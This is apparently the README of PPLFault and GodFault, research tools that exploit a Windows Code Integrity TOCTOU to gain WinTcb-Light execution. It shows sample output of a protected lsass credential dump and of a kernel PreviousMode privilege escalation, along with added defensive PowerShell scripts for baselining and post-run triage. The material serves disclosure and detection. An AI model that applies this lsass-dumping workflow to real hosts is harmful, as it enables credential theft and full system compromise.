
PPLFault

By Gabriel Landau at Elastic Security.

From PPLdump Is Dead. Long Live PPLdump! presented at Black Hat Asia 2023.

PPLFault

Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light, then dumps a specified process. The check is the signature verification of a DLL image when its section is created; the use is the later page-in of that DLL's contents from disk. As the verbose output below shows, the tool first supplies the benign, signed bytes, then purges the system working set so the pages are faulted in again, and supplies payload bytes the second time. Because WinTcb-Light outranks every other PPL signer, the payload can open lsass (ProtectedLight/Lsa) for a dump. For more details on the exploit, see my slides and/or talk.

Example Output

PS C:\Users\user\Desktop> cmd /c ver

Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe                      992 Services                   0     76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection

Type           Signer
----           ------
ProtectedLight Lsa


PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
 [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Dump saved to: lsass.dmp
 [+] Dump is 74.9 MB
 [+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp


    Directory: C:\Users\user\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/1/2023  11:18 AM       78581973 lsass.dmp
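The example above checks one process with Get-NtProcess. The following is an added example, not part of PPLFault, that turns that single check into a baseline a defender can take before and after testing the tool: it reads the LSA RunAsPPL setting, lists every protected process with its type and signer, and states whether lsass is actually PPL (the precondition that makes PPLFault necessary). It assumes the NtObjectManager PowerShell module that the page's own output uses (Install-Module NtObjectManager) and an elevated shell; the registry path and value meanings are Microsoft's documented LSA protection settings.

```powershell
# Added example (not PPLFault code): inventory protected processes and the LSA PPL setting.
# Assumes NtObjectManager is installed and the shell is elevated.
Import-Module NtObjectManager

# RunAsPPL: 1 = LSA protection enabled with UEFI lock, 2 = enabled without UEFI lock
# (Windows 11 22H2 and later). Absent or 0 = not configured by policy. The live
# protection level read below is authoritative; the registry value is only intent.
$lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$runAsPpl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL
"RunAsPPL registry value: $(if ($null -eq $runAsPpl) { '<not set>' } else { $runAsPpl })"

# Open each process with the minimal right needed to read its protection level.
# Unprotected processes report Type 'None'; PID 0 and other unopenable ones are skipped.
$protected = foreach ($p in Get-Process) {
    try {
        $nt = Get-NtProcess -Access QueryLimitedInformation -Pid $p.Id
        try {
            $prot = $nt.Protection
            if ($prot.Type -ne 'None') {
                [pscustomobject]@{
                    Pid    = $p.Id
                    Name   = $p.ProcessName
                    Type   = $prot.Type      # Protected or ProtectedLight (PPL)
                    Signer = $prot.Signer    # e.g. WinTcb, WinSystem, Lsa, Antimalware
                }
            }
        } finally { $nt.Dispose() }
    } catch { }
}
$protected | Sort-Object Type, Signer, Name | Format-Table -AutoSize

# The check the example output performs on PID 992, generalised to whatever PID lsass has now.
$lsass = $protected | Where-Object Name -eq 'lsass'
if ($lsass -and $lsass.Type -eq 'ProtectedLight' -and $lsass.Signer -eq 'Lsa') {
    'lsass is PPL (ProtectedLight/Lsa): an ordinary admin MiniDumpWriteDump is denied; a PPL bypass such as PPLFault is required'
} else {
    'lsass is NOT running as PPL: no PPL bypass is needed to dump it'
}
```

Run it once on a clean machine to learn which signers are normal on that build (WinTcb for smss/csrss/services, Antimalware for the AV engine, and so on); an unexpected WinTcb-Light process, or an lsass that has silently dropped to Type None, is worth a closer look.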

GodFault

Exploits the same TOCTOU as PPLFault. However, instead of dumping a process, it migrates into CSRSS and exploits a vulnerability in win32k!NtUserHardErrorControlCall from ANGRYORCHARD to decrement the current thread's KTHREAD.PreviousMode from UserMode (1) to KernelMode (0). With PreviousMode set to KernelMode, the executive treats that thread's system calls as kernel-originated and skips the access checks that normally apply to user-mode callers. It proves "God Mode" access by opening \Device\PhysicalMemory, normally inaccessible from UserMode, as SECTION_ALL_ACCESS, and by opening the System process with PROCESS_ALL_ACCESS, which fails from user mode before the exploit and succeeds afterwards (see the output below).

Example Output

C:\Users\user\Desktop>GodFault.exe -v
 [?] Server does not appear to be running.  Attempting to install it...
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
 [+] CSRSS PID is 772
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
 [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
 [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
 [+] Opened \Device\PhysicalMemory.  Handle is 0x1b4
 [+] Opened System process as PROCESS_ALL_ACCESS.  Handle is 0x1c0
 [+] Press any key to continue...
 [+] No cleanup necessary.  Backup does not exist.
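GodFault's output shows a pre-check ("Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure") and the post-exploit state ("Opened \Device\PhysicalMemory"). The following is an added triage script, not code from PPLFault or GodFault, that an incident responder can run after either tool has been used on a host: it looks for the filesystem artifacts named in both verbose outputs above, verifies the swapped DLL was restored with a valid signature, searches for recent large minidumps, and repeats GodFault's two probes, which must fail from an ordinary user-mode process. It assumes NtObjectManager and an elevated (but normal, non-PPL) shell. The paths are the PoC defaults as printed on this page; anyone rebuilding the tools can change every one of them, so these checks are a starting point rather than a detection of the technique itself.

```powershell
# Added example (not PPLFault/GodFault code): post-run triage for the artifacts and state
# shown in the verbose outputs. Assumes NtObjectManager and an elevated shell.
Import-Module NtObjectManager

$findings = [System.Collections.Generic.List[string]]::new()

# 1. Filesystem artifacts named in the verbose output. Both tools restore the benign DLL
#    and report "No cleanup necessary" on exit, so a surviving .bak or staging directory
#    points to an interrupted or crashed run.
$artifacts = @(
    'C:\PPLFaultTemp',
    'C:\GodFaultTemp',
    'C:\Windows\System32\EventAggregation.dll.bak'
)
foreach ($path in $artifacts) {
    if (Test-Path -LiteralPath $path) { $findings.Add("artifact present: $path") }
}

# 2. The DLL the PoC swaps must still carry a valid Microsoft signature on disk.
$sig = Get-AuthenticodeSignature -FilePath 'C:\Windows\System32\EventAggregation.dll'
if ($sig.Status -ne 'Valid') {
    $findings.Add("EventAggregation.dll signature status: $($sig.Status)")
}

# 3. Recent large minidumps under user profiles (the example lsass.dmp is ~75 MB).
#    Thresholds are assumptions; tune them to the environment.
Get-ChildItem -Path 'C:\Users' -Filter *.dmp -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 20MB -and $_.LastWriteTime -gt (Get-Date).AddDays(-7) } |
    ForEach-Object {
        $findings.Add("recent large dump: $($_.FullName) ($([math]::Round($_.Length / 1MB)) MB)")
    }

# 4. The two probes GodFault runs. From a normal user-mode thread both must FAIL with
#    access denied; success means this thread's PreviousMode is KernelMode (or the
#    kernel's access checks are otherwise broken) and the host should be treated as compromised.
try {
    $sec = Get-NtSection -Path '\Device\PhysicalMemory' -Access MapRead
    $sec.Dispose()
    $findings.Add('ALERT: \Device\PhysicalMemory opened from user mode')
} catch { }   # expected: STATUS_ACCESS_DENIED
try {
    $sys = Get-NtProcess -Pid 4 -Access AllAccess
    $sys.Dispose()
    $findings.Add('ALERT: PROCESS_ALL_ACCESS to System (PID 4) granted from user mode')
} catch { }   # expected: STATUS_ACCESS_DENIED (System is a protected process)

if ($findings.Count -eq 0) { 'No PPLFault/GodFault indicators found' } else { $findings }
```

The oplock on C:\Windows\System32\devobj.dll and the placeholder file under the staging directory exist only while the tool runs, so they are visible to file-system telemetry (Sysmon FileCreate, EDR file events) rather than to an after-the-fact disk scan; the dump itself can be written to any path the operator chooses.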

Python

PoC in Python that achieves arbitrary code execution as WinTcb-Light without the Cloud Filter API. The C++ tools above use that API to supply the benign and then the payload file contents on demand (the "FetchDataCallback" and "Hydrating" lines in their output); the Python variant reaches the same TOCTOU by another route. See python/README.md.

Tested Platforms

Tool       Windows 11 22H2 22621.1702 (May 2023)   Windows 11 Insider Canary 25346.1001 (April 2023)
--------   -------------------------------------   -------------------------------------------------
PPLFault   ✔️                                       ✔️
GodFault   ✔️                                       ❌ Insider PreviousMode mitigation bugchecks

License

PPLFault is covered by the ELv2 license. It uses phnt from SystemInformer under the MIT license.

Credits

Inspired by PPLdump by Clément Labro, which Microsoft patched in July 2022.

ANGRYORCHARD was created by Austin Hudson, who released it when Microsoft patched PPLdump.
